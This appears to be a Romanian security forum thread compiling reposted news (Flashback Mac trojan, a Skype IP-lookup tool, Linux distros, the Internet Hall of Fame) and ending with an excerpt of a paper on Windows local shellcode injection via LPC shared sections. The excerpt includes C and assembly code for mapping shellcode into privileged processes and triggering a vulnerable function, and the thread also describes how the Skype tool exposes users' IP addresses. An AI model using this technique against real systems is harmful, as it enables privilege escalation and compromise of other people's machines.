ionut97

Este o prezentare pentru o conferinta de securitate, un pptp cum fac toti. Aici: Nu este din CEH.

In a recent analysis of the business model behind the Flashback Trojan, Symantec security researchers reported that the main objective of the malware is revenue generation through an ad-clicking component. Security researchers at Symantec are estimating that the cyber-crimibals behind the Flashback Mac OS X botnet may have raked in about $10,000 a day. Dr. Web, the Russian security firm that firm discovered the massive Flashback botnet last month, has provided new data on the number of Macs still infected with the software. The results show that while close to 460,000 machines remain infected, the botnet is shrinking at a rate of close to a hundred thousand machines a week as Mac users get around to downloading Apple’s tool for disinfecting their machines or installing antivirus. when an infected user conducts a Google search, Google will return its normal search results. Flashback waits for someone to click on an ad, and once this happens the user is silently directed to another, irrelievant ad that generates revenue for the attackers.As a result, Google doesn't know someone has clicked into its client's ad, and the client never knows its ad wasn't delivered. Ultimately, Google's advertising clients are paying for Flashback's attackers to host ads on Google. Story Posted on Symantec’s blog: The Flashback ad-clicking component is loaded into Chrome, Firefox, and Safari where it can intercept all GET and POST requests from the browser. Flashback specifically targets search queries made on Google and, depending on the search query, may redirect users to another page of the attacker’s choosing, where they receive revenue from the click . (Google never receives the intended ad click.) The ad click component parses out requests resulting from an ad click on Google Search and determines if it is on a whitelist. If not, it forwards the request to a malicious server. Hackers tricked Mac users into downloading the virus by disguising it as an update to Adobe Flash video viewing software.Flashback Trojan malware tailored to slip past "Mac" defenses is a variation on viruses typically aimed at personal computers (PCs) powered by Microsoft's Windows operating systems. Sursa: Flashback malware Creater earning $10,000 per day from Google Ads | The Hacker News

Skype is warning users following the launch of a site devoted to harvesting user IP addresses.The Skype IP-Finder site allowed third-parties to see a user's last known IP address by simply typing in a user name. A script has been uploaded to Github that offers these options. According to the page, it can be used to lookup IP addresses of online Skype accounts, and return both the remote and the local IP of that account on a website. The script is for instance available on this site. Just enter the user name of a Skype user, fill out the captcha, and click the search button to initiate the lookup. You will receive the user’s remote IP and port, as well as the local IP and port. Adrian Asher, director of product Security, Skype “We are investigating reports of a new tool that captures a Skype user’s last known IP address. This is an ongoing, industry-wide issue faced by all peer-to-peer software companies. We are committed to the safety and security of our customers and we are takings measures to help protect them.” The proof of concept is fairly simple. All an attacker needs to do is download a special Skype variant and alter a few registry keys to enable debug-log file creation.When adding a Skype contact, before sending the actual request, the victim’s information card can be viewed. At this point, the log file records the user’s IP address. The software, posted on Pastebin, works on a patched version of Skype 5.5 and involves adding a few registry keys that allow the attacker to check the IP address of users currently online. Services like Whois will then give some other details on the city, country, internet provider and/or the internal IP-address of the target. This particular flaw was discussed in a paper presented by an international team of researchers in November at the Internet Measurement Conference 2011 in Berlin. There is currently no way of protecting yourself against the lookup of the IP address, other than not logging in to Skype when the software is not needed. The only other option would be the use of a virtual private network or proxy to hide the IP address from users who look it up. Source: Skype Vulnerability Exposing User IP Addresses | The Hacker News

Catalog of key Windows kernel data structures During our Windows internals and debugging classes, students frequently ask us questions along the lines of - "What data structure does the Windows kernel use for a mutex?". This article attempts to answer such questions by describing some of the key data structures that are used by the Windows kernel and device drivers. This article lays emphasis on the relationship of a structure with others in the system, helping the reader navigate through these structures in the kernel debugger. While reading this article, the reader is encouraged to have a kernel debugger readily available to try out the debugger commands and examine the structures and their fields. This article is intended to be a reference, not a tutorial. For each structure, this article provides a high level description of the structure, followed by details of some of the important fields that point to other structures. If applicable, debugger commands that apply to the structure and functions that manipulate the structure are provided. Most of the data structures mentioned in this article are allocated by the kernel from paged or non-paged pool, which is a part of the kernel virtual address space. The following data structures are discussed in this document, click on any of them to directly go to the description. Doubly Linked List : LIST_ENTRY Process and Thread : EPROCESS, KPROCESS, ETHREAD, KTHREAD Kernel and HAL : KPCR, KINTERRUPT, CONTEXT, KTRAP_FRAME, KDPC, KAPC, KAPC_STATE Synchronization Objects : DISPATCHER_HEADER, KEVENT, KSEMAPHORE, KMUTANT, KTIMER, KGATE, KQUEUE Executive & RTL : IO_WORKITEM I/O Manager : IRP, IO_STACK_LOCATION, DRIVER_OBJECT, DEVICE_OBJECT, DEVICE_NODE, FILE_OBJECT Objects and Handles : OBJECT_HEADER, OBJECT_TYPE, HANDLE_TABLE_ENTRY Memory Manager : MDL, MMPTE, MMPFN, MMPFNLIST, MMWSL, MMWSLE, POOL_HEADER, MMVAD Cache Manager : VACB, VACB_ARRAY_HEADER, SHARED_CACHE_MAP, PRIVATE_CACHE_MAP, SECTION_OBJECT_POINTERS Gasiti tot aici: CodeMachine - Article - Catalog of key Windows kernel data structures

David Kennedy(ReL1K) Rob Simon

PDF: http://www.secmaniac.com/files/Hacking%20the%20perimeter.pdf Hacking your perimeter... Not everyone needs to use zero days... David Kennedy(ReL1K) SecManiac.com

Cu cat citesc mai mult imi dau seama ca acel troian este de vina. Diving into the FlashBack Mac Worm | wasnt nate "Yay! It has finally happened, OSX has had its first big worm. Hopefully this will mark the end of Apple users not taking security seriously. With any luck this will be analogous to the Blaster worm that helped mandate the Trustworthy Computing Initiative (TWC) at Microsoft." First Serious Mac Infection: Flashback Trojan - The Internet Patrol "Summary: Up until now Mac owners have been relatively safe (and smug) when it came to the infectability of their computers. Worms, trojans, viruses, and other malware were considered to be primarily the domain of Windows. That may have changed last week, however, when the Russian security company, Dr. Web, reported that as many as a half a million Macs are already infected with what is being called the "Flashback Trojan". Here's how to know if you have Flashback Trojan, and how to get rid of Flashback Trojan. Most Recent Searches that Led to This Page: flashback worm, flashback mac worm testing, flashback worm mac, how do you know if you are infected ? flashback, mac virus check worm, see if i have flashback worm, virus blocker flash back mac" Cititi si voi.

Cam pe toate site-urile de stiri este un articol despre wormul/botnetul/troinul Flashback care ataca sistemele Macintosh.In articolul original Kaspersky: Mac security is '10 years behind Microsoft' | Apple - CNET News cei de la Kaspersky se refera si la acest worm.Nu am citit multe despre el dar se pare ca este ceva serios. Mai multe aici:More than 600000 Macs system infected with Flashback Botnet | The Hacker News Poate ca asta l-a intrigat pe Eugene Kaspersky sa declare asa ceva.

Whether you're a beginner or you've been using Linux systems for years, you probably have an opinion on what the best distribution is. "Best," is obviously a relative term, and we understand that what's best for beginners may not be best for advanced users, and so on. Still, Linux distributions come in all different shapes, sizes, complexities, styles, and types. We asked you which ones you preferred, and now we're back to take a look at the top five distros based on your nominations. Earlier in the week we asked you which Linux distros you thought were the best when it came to ease-of-use, support, functionality, compatibility, and that overall had the right mix of features for you. You certainly weighed in, with well over 400 votes! We tallied them up, and now we're back to showcase your five favorites. And, if you're new to Linux, be sure to check out our guide to getting started with Linux before you dive into one of these great distros. The poll is closed and the votes are counted. To see which of these distros took the top spot, head over to our hive five followup post to see and discuss the winner! Arch Linux Arch Linux is something of a rising star in the Linux community, and when we showed you how to pick the right distro for you, many of you really resonated with the fact that with Arch, you install pretty much everything from scratch—which requires a certain level of comfort with the command line, but it also gives you complete control over how customized the overall installation is for you. Installing Arch really is like building a distro that has your name on it, and it can be as simple or complex as you need it to be. For the minimal crowd who prefers lightweight installs, you can keep your system lean and mean. For the feature-lovers, you can load it up as much as you want. It's a great distro for people who really want to learn the ins and outs of Linux, even if it's not the easiest, most mainstream, or newbie-friendly. You'll learn a lot, though, and if you're all about Arch, you shouldn't miss our own Whitson Gordon's guide to building a killer Arch Linux installation. Ubuntu (and Variants) Ubuntu has some star power behind it, and it's probably the most popular Linux flavor available right now. If you've tried Linux at some point, you've probably tried Ubuntu, and for good reason. It's easy to install, customizable, offers some great features that weren't standard in distros popular prior to Ubuntu's popularity, and it updates every six months with new features and plenty of improvements. Ubuntu's mission was to bring Linux to the masses, and it's done an incredible job. Ubuntu's community is massive, so there's plenty of places to go for help troubleshooting or making the most of your installation, and virtually every Linux-compatible program or applications works in Ubuntu without issue. The only divisive issue with it is the growing size of the distro (many complain it's getting bloated) and Ubuntu's Unity UI, which you either love or hate. Either way, if you're just getting started with Linux and want the experience without getting too dirty in the process, Ubuntu is a great place to start, and a great way to ease your way into the wonders of Linux. Linux Mint Linux Mint is probably one of the better beginner distros available. Where Ubuntu wanted to make Linux available to the masses, Mint picked up the torch and carried it even further, with an install that in most cases doesn't even require you to look at a command line, an interface that emphasizes the graphical and minimizes the command line entirely, and an overall UI that will make people who are used to OS X and Windows feel comfortable and at home just logging in and getting some work done without a lot of hassle. It makes some tradeoffs in complexity in the process, and the die-hard open source fan likely won't be happy with Mint's decision to embrace closed source applications and drivers over open-source options for the sake of ease and familiarity, but to the beginner who isn't interested in any of that or is choosing Linux because they want to experiment or are concerned about their security, it's a great option. Fedora Quick poll: how many people remember Fedora when it was Fedora Core, and had just split off from Red Hat? I do—I was a die hard Fedora fan at the time, and while my loyalties may have strayed, I still have a special place in my heart for it. Fedora updates every six months, much like some of the other popular distros, but you'll find the community behind Fedora tends to stay on the cutting edge when it comes to platform updates, driver updates, and application updates. it's fast and it's stable—but be ready to start troubleshooting when something you've just installed breaks down. Old school fans who still love the Yum package manager will find it's still there in Fedora (even though most other distros have moved on to APT), and enterprise Linux users will appreciate its roots in and still-somewhat intertwined relationship with Red Hat. Debian Debian has a long long history, and I remember when people in my old LUG used to call it a "cutting edge" distro with great support. These days Debian prides itself on its rock-solid stability, and shies away from the bleeding edge a bit. It's an old distro with a lot of developers in it that have been around for a long time, watching Linux rise to the mainstream and drop out of sight several times over the years, and have stuck with their preferred distro, so while the community is there for help if you need it, make sure you've tried fixing the problem and researching it on your own before you call for help. To that end though, Debian updates every few years, which also makes it a great choice if you're trying to run Linux on some seriously outdated hardware.

The best revolutionaries eventually find themselves hailed in tributes and enshrined in museums. So it's almost inevitable that nearly 30 years after the official birthdate of the Internet, some of the net's best-known pioneers, radicals, and troublemakers are being inducted into the Internet Society's Hall of Fame. The inaugural group includes 33 of the net's most influential engineers, evangelists and entrepreneurs including Internet fathers Robert Kahn and Vinton Cerf; Internet standards guru Jon Postel; web inventor Tim Berners-Lee; encryption pioneer Phil Zimmermann; and Mozilla's Mitchell Baker. And, yes, snarky late night comedy aside -- former vice president Al Gore is being inducted as well. The inductees were announced Monday in Geneva, Switzerland at Internet Society's annual conference, where the group is celebrating its 20th year. ISOC is home to the Internet Engineering Task Force, the net's technical standards setting body, and is funded largely by the .org top level domain. While the Internet's origins are firmly based in American university computer labs and DARPA, the U.S. military's long-term research arm, Geneva is a natural home for the awards. The World Wide Web was born here at Cern, just a few kilometers from the conference center, and Switzerland has a long history as an international center for diplomacy -- symbolically important for an organization dedicated to including civil society, engineers, corporations and governments in decisions affecting the net. But as the revolutionaries celebrate having created the world's most important communications medium, they also murmur about looming threats to their creation. This year saw the U.S. government push to modify the net's infrastructure to protect the business model of the music and motion picture industry in the U.S., setting off a dramatic protest in the U.S. Around the globe, repressive and authoritarian regimes have reacted to political dissent by installing filters, firewalls and first-world surveillance technologies. Geneva is also home to the International Telecommunication Union, a U.N. arm that sets rules, standards and rates for international telecommunications, and parts of whose membership has been making noise about exerting more state control over Internet governance. That move -- seen to be driven by non-democratic countries including Russia, China and states in the Middle East -- is seen as by many at ISOC as a threat to the the core principles of the Internet. But despite those looming clouds, the Internet's founders and visionaries have much to celebrate. Some two billion people around the world are connected to the Internet, where they can communicate locally and globally for virtually no-cost and have access to knowledge, news and gossip at a speed and depth imaginable 30 years ago only by a small handful of people -- many of whom are being inducted into the hall of fame for envisioning and building that network of networks. Over the next year, Wired will be publishing Q&As with the living inductees and profiles of the three who were posthumously inducted. The inductees fall into three categories: Pioneers who were key to the early design of the Internet; Innovators who built on the net's foundations with technical innovations and policy work; and Global Connectors who have helped expand the net's growth and use around the world. Pioneers Vinton Cerf: Considered one of the fathers of the Internet, Cerf co-wrote the TCP/IP protocol that unites the world's computer networks into the Internet. He also co-founded ISOC, served as chairman of the board of ICANN, and is now a vice president at Google. Danny Cohen: Cohen created the world's first real-time visual flight simulator and in 1981, ported it over to run over Arpanet, creating the net's first real-time application. Cohen was also a pioneer, starting work in the 1970s on Voice over IP and online video. Steve Crocker: An early co-conspirator at UCLA with Jon Postel and Vint Cerf, Crocker is known as the father of the Request For Comment (RFC), setting the tone and format for the net's gracious way of recommending and eventually cementing standards. Donald W. Davies: A Welsh computer scientist who worked with Alan Turing, Davies was one of the inventors of the idea of packet-switched networks in the 1960s, and gave it the name. His invention was used to create the first two packet-switched networks and laid the groundwork for the Internet. Elizabeth "Jake" Feinler: For 17 years, she headed the Network Information Systems Center that was the net's original nerve center for RFCs and Internet addresses, composed the net's original technical documentation. Her group operated the first WHOIS server and developed the top-level domain system comprising .com, .edu, .gov, .mil, .org, and .net. Charles Herzfeld: The director of DARPA from 1965 to 1967, Herzfeld was convinced of the need for interconnected computer and authorized the creation of Arpanet, the net's direct predecessor. Robert E. Kahn: One of the fathers of the Internet, Kahn built on his work at Arpanet to make diverse networks speak to one another in a common language. With Vinton Cerf, Kahn co-wrote the TCP/IP protocol and later co-founded the Internet Society. Peter Kirstein: Working together with Vinton Cerf in the late 1970s, Kirstein co-authored one of the net's most important papers on interconnection and played a key role in early tests of the Internet. Leonard Kleinrock: Starting with his doctoral thesis in 1962, Kleinrock developed key mathematical models for packet switched networks and continued that work as a professor at UCLA. Considered to be among the fathers of the Internet, Kleinrock supervised the first message ever sent over Arpanet and contributed key theoretical work for hierarchical network routing. John Klensin: Beginning his work on net standards in 1969, with contributions to FTP, Klensin has contributed to key protocols including DNS and SMTP, as well as serving long terms on the Internet Architecture Board, including chairing the board. Jon Postel: Most famous for singlehandely running the net's naming system until his death in 1998, Postel was the RFC editor starting in 1969, served on the IAB, and wrote some of the net's most fundamental protocols. Postel also wrote the "Robustness Principle" RFC, instructing the net to be "be conservative in what you do, be liberal in what you accept." Louis Pouzin: The inventor of datagrams (packets without loss notifications), Pouzin designed an early packet switching network that was highly influential in the eventual design of the TCP/IP protocol that defines the Internet. Lawrence Roberts: Roberts was one of the developers of the idea of using data packets to create a distributed computing network, and in 1966, became the program manager of Arpanet and was responsible for the system's design. Innovators Mitchell Baker: Starting as the lawyer who wrote the open source license for Mozilla, Baker led Mozilla into developing Firefox, which upended the stagnant web browser market just as the net entered the world of Web 2.0 interactivity. Baker has turned Mozilla into a force for the open web that also delivers free, open-source applications into the hands of millions of net users. Tim Berners-Lee: Marrying hypertext to the TCP/IP protocol, Berners-Lee invented the World Wide Web in 1989 as an open standard. In addition to designing HTTP and HTML, Berners-Lee also invented the first browser and web server. Robert Caillau: The co-founder of the World Wide Web, he co-authored the funding proposal for the project to CERN with Berners-Lee. He also wrote the first web browser for the Mac. Van Jacobson: When the Internet began to grow in the late 80s, Jacobsen devised a flow control algorithm for TCP that allowed the network to scale and avoid congestion, which is still used today. A leader in network diagnostics and performance, he won a ACM SIGCOMM lifetime achievement award in 2001. Lawrence H. Landweber: Working on behalf on a consortium of universities, Landweber proposed the creation of a federally funded network, called CSNET, that would link up university computer science programs that couldn't get on Arpanet. CSNET, funded in 1981, linked up more than 180 universities internationally, spread the gospel of the Internet and served as the predecessor to NSFnet that became one of the Internet's backbone networks. Paul Mockapetris: Recognizing in the early '80s that a single, centralized table linking domain names to IP addresses wasn't going to scale, Mockapetris proposed distributed system instead, inventing, along with Postel, the net's distributed and dynamic Domain Name System. Craig Newmark: Seeking to connect a group of friends, Newmark founded Craigslist in 1995, making it possible for net users around the globe to find apartments, jobs and used couches for free. Newmark has also been vocal in supporting an open web. Ray Tomlinson: In 1971, Tomlinson created the first email system that could send messages between different systems on Arpanet, and is the person responsible for using the @ sign to differentiate between hosts. Linus Torvalds: In 1991, in conjunction with his Masters thesis, Torvalds began work on the free and open-source Linux kernel, leading to a wide range of Linux operating systems that power many of the world's servers, routers, supercomputers and smartphones. Phil Zimmermann: Zimmermann, a tireless advocate for privacy and security, is best known as the creator of Pretty Good Privacy, the net's leading e-mail encryption system, which earned him an investigation by the U.S. government. Global Connectors Randy Bush: Bush founded the Network Startup Resource Center (NSRC), which with the help of the National Science Foundation, helped spread networking technology to the developing world in order to help local scientists, engineers and educators collaborate with international colleagues by providing assistance to local network engineers. Kilnam Chon: Chon won the prestigious Jon Postel Service Award in 2011 for his work in spreading the Internet in Asia. Al Gore: As a U.S. senator in the 1980s, Gore was the first politician to grasp the potential of the Internet. Gore wrote the High Performance Computing and Communications Act that passed in 1991 which helped spread the net beyond computer science professionals by providing key funding to Internet projects, including the groundbreaking Mosaic browser which led to the dot-com boom. Nancy Hafkin: Working for the United Nations Economic Commission for Africa, Hafkin was instrumental in the spread of networking and electronic communication in Africa. In the early 1990s, she played a key role in efforts to spread e-mail to countries in Africa. Geoff Huston: From 1995 to 2005, Geoff helped construct and develop Telestra's Internet architecture in Australia building on his work in the 1980s, when he led the initial construction of the Australia's Internet. He was also the executive director of the Internet architecture board from 2001 to 2005. Brewster Kahle: After a successful entrepreneurial career in the first dot-com gold rush, Kahle set out to become the web's archivist and librarian, creating the Internet Archive that caches copies of the Web for posterity. His newest project aims to collect one copy of every paper book ever printed. Daniel Karrenberg: Karrneberg was the founding CEO of the RIPE Network Coordination Center, which was the world's first Regional Internet Registry, covering Europe, the Middle East and parts of Africa and Central Asia. Now RIPE NCC's chief scientist, he has also served three years as the chairman of the board of ISOC. Toru Takahashi: Sometimes known as the "Mother of the Internet" in Japan, Takahashi was instrumental in bringing the Internet to Japan and promoting it throughout Asia in the 1990s. A journalist who turned to entrepreneurship and Internet evangelism, Takahashi was key to the early commercial development of the Internet. Tan Tin Wee: Dr. Tan Tin Wee founded the multilingual Internet domain name system and has an Internet pioneer in Singapore, central to the net's adoption among both Chinese and Tamil communities throughout Asia. Source: The Internet gets a hall of fame (yes including Al Gore) - CNN.com

Recentele probleme de securitate pentru computerele Mac l-au facut pe fondatorul companiei de securitate online Kaspersky Lab sa dea un verdict sumbru - Apple se afla cu 10 ani in urma Microsoft la capitolul securitate. Eugene Kaspersky, CEO Kaspersky Lab, sustine ca Apple are multe de invatat de la Microsoft in ceea ce priveste securitatea online. Kaspersky sustine ca Apple va avea in curand aceleasi probleme pe care Microsoft le-a infruntat in urma cu 10-12 ani, potrivit CNET. Odata cu popularitatea sistemului de operare Mac OS X, numarul dezvoltatorilor de malware este in crestere, iar compania Apple nu pare pregatita sa faca fata situatiei, crede Kaspersky. Compania fondata de Steve Jobs a fost criticata pentru ca nu a rezolvat mai rapid vulnerabilitatile Mac ce au dus la infectarea a 600.000 de computere cu malware-ul troian Flashback, Apple va avea de infruntat pericole tot mai mari si poate invata de la Microsoft cateva lectii de securitate, a mai explicat specialistul. Sursa: http://www.hit.ro/internet-securitate/Kaspersky-Apple-se-afla-cu-10-ani-in-urma-Microsoft-la-capitolul-securitate

The BackBox team has announce the release 2.05 of BackBox Linux. The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools. What's new System upgrade Bug corrections Performance boost Improved start menu Improved WiFi driver (compat-wireless aircrack patched) New Hacking tools: creepy, fern-wifi-cracker, joomscan, pyrit, reaver, xplico, etc. Updated tools: crunch, fimap, hydra, magictree, metasploit, set, sipvicious, skipfish, w3af, weevely, wireshark, wirouterkeyrec, wpscan, zaproxy, theharvester, xsser, etc. Download Backbox 2.05

WLSI Windows Local Shellcode Injection Author: Cesar Cerrudo (cesar>.at.<argeniss>.dot.<com) Argeniss – Information Security Abstract: This paper describes a new technique to create 100% reliable local exploits for Windows operating systems, the technique uses some Windows operating systems design weaknesses that allow low privileged processes to insert data on almost any Windows processes no matter if they are running under high privileges. We all know that local exploitation is much easier than remote exploitation but it has some difficulties. After a brief introduction and a description of the technique, a couple of samples will be provided so the reader will be able to write his/her own exploits. Introduction: When writing a local Windows exploit you can face many problems: -Different return addresses: -Because different Windows versions. -Because different Windows service pack level. -Because different Windows languages. -Limited space for shellcode. -Null byte restrictions. -Character set restrictions. -Buffer overflows/exploits protections. -Etc. To bypass those restrictions an exploit has to use many different return addresses and/or techniques. After you finish reading this paper you won't have to worry any more about that because it will be very easy to write a 100% reliable exploit that will work on any Windows version, service pack level, language, etc. and could bypass buffer overflows/exploits protections since the code won't be executed from the stack nor the heap and it won't use a fixed return address. This technique relies in the use of Windows LPC (Local/Lightweight Procedure Call), this is an inter-process communication mechanism, RPC (Remote Procedure Call) uses LPC as a transport for local communications. LPC allow processes to communicate by "messages" using LPC ports. LPC is not well documented and here won't be detailed but you can learn more at the links listed on references section. LPC ports are Windows objects, servers (processes) can create named LPC ports to which clients (processes) can connect by referencing their names. You can see processes LPC ports using Process Explorer from Windows Sysinternals: Documentation, downloads and additional resources, by selecting a process in the upper panel and then looking at the lower panel at the Type column, they are identified by the word Port, you can see the port name, handle and by double clicking you can see additional information like permissions, etc. LPC is heavily used by Windows internals, also by OLE/COM, etc. this means that almost every Windows process has a LPC port. LPC ports can be protected by ACLs so sometimes a connection can not be established if the client process doesn't have proper permissions. To use this technique we will need to use a couple of APIs that will be detailed below. Establishing a connection to a LPC port: In order to establish a connection to a LPC port the next native API NtConnectPort from Ntdll.dll is used. NtConnectPort( OUT PHANDLE ClientPortHandle, IN PUNICODE_STRING ServerPortName, IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, IN OUT PLPCSECTIONINFO ClientSharedMemory OPTIONAL, OUT PLPCSECTIONMAPINFO ServerSharedMemory OPTIONAL, OUT PULONG MaximumMessageLength OPTIONAL, IN OUT PVOID ConnectionInfo OPTIONAL, IN OUT PULONG ConnectionInfoLength OPTIONAL ); ClientPortHandle: pointer to the port handle returned by the function. ServerPortName: pointer to a UNICODE_STRING structure that holds the port name to which the function will connect to. SecurityQos: pointer to a SECURITY_QUALITY_OF_SERVICE structure. ClientSharedMemory: pointer to a LPCSECTIONINFO structure, used for shared section information. ServerSharedMemory: pointer to a LPCSECTIONMAPINFO structure, used for shared section information. MaximumMessageLength: pointer to maximum message size number returned by function. ConnectionInfo: pointer to a buffer of message data, this data is sent and returned to and from LPC server. ConnectionInfoLength: pointer to the length of message data. There are others LPC APIs but they won't be detailed here because they won't be used by this technique, if you want to learn more look at the references section. To establish a connection the most important values we have to supply are: the LPC port name in an UNICODE_STRING structure: typedef struct _UNICODE_STRING { USHORT Length; //length of the unicode string USHORT MaximumLength; //length of the unicode string +2 PWSTR Buffer; //pointer to the unicode string } UNICODE_STRING; the LPCSECTIONINFO structure values: typedef struct LpcSectionInfo { DWORD Length; //length of the structure HANDLE SectionHandle; //handle to a shared section DWORD Param1; //not used DWORD SectionSize; //size of the shared section DWORD ClientBaseAddress; //returned by the function DWORD ServerBaseAddress; //returned by the function } LPCSECTIONINFO; to fill this structure a shared section (see [1] for more info on shared sections) has to be created, this shared section will be mapped on both processes (the one which we are connecting from and the target process we are connecting to) after a successful connection. On LPCSECTIONMAPINFO structure we only have to set the length of the structure: typedef struct LpcSectionMapInfo{ DWORD Length; //structure length DWORD SectionSize; DWORD ServerBaseAddress; } LPCSECTIONMAPINFO; SECURITY_QUALITY_OF_SERVICE structure can have any value, we don't have to worry about it: typedef struct _SECURITY_QUALITY_OF_SERVICE { DWORD Length; SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; DWORD ContextTrackingMode; DWORD EffectiveOnly; } SECURITY_QUALITY_OF_SERVICE; for ConnectionInfo data we can use a buffer with 100 null elements, ConnectionInfoLength should have the length of the buffer. Creating a shared section: For using this technique before a connection to a LPC port is established we need to create a shared section. To create a shared section the next native API NtCreateSection from Ntdll.dll is used. NtCreateSection( OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL ); SectionHandle: pointer to a section handle returned by the function. DesiredAccess: specify the kind of access desired: read, write, execute, etc. ObjectAttributes: pointer to a OBJECT_ATTRIBUTES structure. MaximunSize: pointer to the size of the section when creating a shared memory section. PageAttributes: memory page attributes: read, write, execute, etc. SectionAttributes: section attributes depending on the kind of section to be created. FileHandle: handle to a file when creating a file mapping. We only have to care about the next parameters: For DesiredAccess parameter we have to set what access to the section we want to have, we will need read and write access. On MaximunSize we have to set the size of the section we want, this can be any value but it should be enough to hold the data we will put later. For PageAttributes we have to set also read and write, finally for SectionAttributes we have to set it to committed memory. The technique: Now that we know the APIs needed to establish a LPC connection let's see how this technique works. As I said most Windows processes have LPC ports to which we can connect (if we have proper permissions), as you have seen on the NtConnectPort API parameters we can supply a shared section on one of the structures, this shared section will be mapped on both processes that are part of the communication, this is really good news, why this is so good? because it means that “all” the stuff we put on our process shared section will be instantly mapped on the other process, this is really crazy we can inject any data (shellcode of course!!!) on any process we want no matter if the process is running with higher privileges than our process!. What is more amazing is that the address where the shared section is mapped at the target process will be returned by the function!!!, if you don't know yet why this is so good you should go and learn how to write exploits before continuing reading this . Basically when exploiting a vulnerability using LPC we will be able to put shellcode on target process and we will know exactly were the shellcode is located, so we only have to make the vulnerable process to jump to that address and voila!, that's all. For instance if you want to put code on smss.exe process you have to create a shared section, connect to \DbgSsApiPort LPC port, then put the code on the shared section and that code will be instantly mapped on smss.exe address space, or maybe you want to put code on services.exe process, do the same as described before but connecting to \RPC Control\DNSResolver LPC port. This technique has the following pros: · Windows language independent. · Windows service pack level independent. · Windows version independent. · No shellcode size restrictions. · No null byte restrictions, no need to encode. · No character set restrictions. · Bypass some exploit/overflow protections. · Quick exploit development. This technique has the following cons: · Few processes haven't a LPC port, not very likely, most Windows processes have one. · Couldn't work if the vulnerability is a buffer overflow caused by an ASCII string, because sometimes the server shared section address at the server process is 0x00XX0000, this is not very likely, most (if not all) buffer overflow vulnerabilities on Windows are caused by Unicode strings, also this problem can be solved by connecting multiple times to a LPC port until a good address is returned. Building an exploit: Basically an exploit using this technique will have to do the next: · Create a shared section to be mapped on LPC connection. · Connect to vulnerable process LPC port specifying the previously created shared section. After a successful connection two pointers to the shared section are returned, one for the shared section at client process and one for the server process. · Copy shellcode to shared section mapped at client process. This shellcode will be instantly mapped on target process. · Trigger the vulnerability making vulnerable process jump to the shared section where the shellcode is located. This is done by overwriting return addresses, pointers, etc. with the pointer to the server process shared section. Let's see a simple sample exploit for a fictitious vulnerability on service XYZ where VulnerableFunction() takes a Unicode string buffer and sends it to XYZ service where the buffer length is not properly validated. While this sample is based on a buffer overflow vulnerability this technique is not limited to this kind of bugs, it can be used on any kind of vulnerabilities as you can see on the exploits available with this paper (see Sample Exploits). The next code creates a committed shared memory section of 0x10000 bytes with all access (read, write, execute, etc.) and with read and write page attributes: -----Code begins------ HANDLE hSection=0; LARGE_INTEGER SecSize; SecSize.LowPart=0x10000; SecSize.HighPart=0x0; if(NtCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize, PAGE_READWRITE,SEC_COMMIT ,NULL)) printf(“Could not create shared section. \n”); -----Code ends------ The following code connects to a LPC Port named LPCPortName, passing the handle and size of a previously created shared section, this section will be mapped on both processes participating on the connection after a successful connection: -----Code begins------ HANDLE hPort; LPCSECTIONINFO sectionInfo; LPCSECTIONMAPINFO mapInfo; DWORD Size = sizeof(ConnectDataBuffer); UNICODE_STRING uStr; WCHAR * uString=L"\\LPCPortName"; DWORD maxSize; SECURITY_QUALITY_OF_SERVICE qos; byte ConnectDataBuffer[0x100]; for (i=0;i<0x100;i++) ConnectDataBuffer=0x0; memset(&sectionInfo, 0, sizeof(sectionInfo)); memset(&mapInfo, 0, sizeof(mapInfo)); sectionInfo.Length = 0x18; sectionInfo.SectionHandle =hSection; sectionInfo.SectionSize = 0x10000; mapInfo.Length = 0x0C; uStr.Length = wcslen(uString)*2; uStr.MaximumLength = wcslen(uString)*2+2; uStr.Buffer =uString; if (NtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo, &maxSize,(DWORD*)ConnectDataBuffer,&Size)) printf(“Could not connect to LPC port.\n”); -----Code ends------ After a successful connection pointers to the beginning of the mapped shared section on client process and the server process is returned on sectionInfo.ClientBaseAddress and sectionInfo.ServerBaseAddress respectively. The next code copies the shellcode to the client mapped shared section: -----Code begins------ _asm { pushad lea esi, Shellcode mov edi, sectionInfo.ClientBaseAddress add edi, 0x10 //avoid 0000 lea ecx, End sub ecx, esi cld rep movsb jmp Done Shellcode: //place your shellcode here End: Done: popad } -----Code ends------ The next code triggers the vulnerability making vulnerable process jump to the server mapped shared section: -----Code begins------ _asm{ pushad lea ebx, [buffer+0xabc] mov eax, sectionInfo.ServerBaseAddress add eax, 0x10 //avoid 0000 mov [ebx], eax //set pointer to server shared section to overwrite return address popad } VulnerableFunction(buffer); //trigger the vulnerability to get shellcode execution -----Code ends------ Problems with LPC ports: There are some problems when exploiting using LPC: 1. Some LPC port names are dynamic (ie: ports used by OLE/COM), this means that the name of the port changes all the time when it's created by a process. 2. A few LPC ports have strong ACL and won't let us to connect unless we have enough permissions. 3. Some LPC ports need some specific data to be passed on ConnectionInfo parameter in order to let us establish a connection. To solve problem #1 we have 2 alternatives, the first one is to reverse engineering how LPC port names are resolved but this is very time consuming and I'm very lazy so we have the second alternative (the easy one which is to hook certain function to get the port name. When working with automation (OLE/COM) before connecting to the port the client process resolves the name of target server LPC port by some black magic, this is all done automatically by COM/OLE functionality, reverse engineering all this seems complicated, but what we can do is to hook the NtConnectPort API so we can get the target port name when the function tries to connect to the port. This method can be seen on one of the exploits available with this paper (see Sample Exploits). Problem #2 seems impossible to solve, did I say impossible, sorry that word doesn't exist on hacker dictionary , right now it seems it can't be solved but LPC is so obscure and I have seen some weird things on LPC that I'm not 100% sure. It's possible to connect indirectly to an LPC port “bypassing” permissions but it seems difficult to have a shared section created, I should go deep on this when I have some free time . Problem #3 can be easily solved by reverse engineering how the connection to the problematic port is established. Just debug, set a breakpoint on NtConnectPort API and 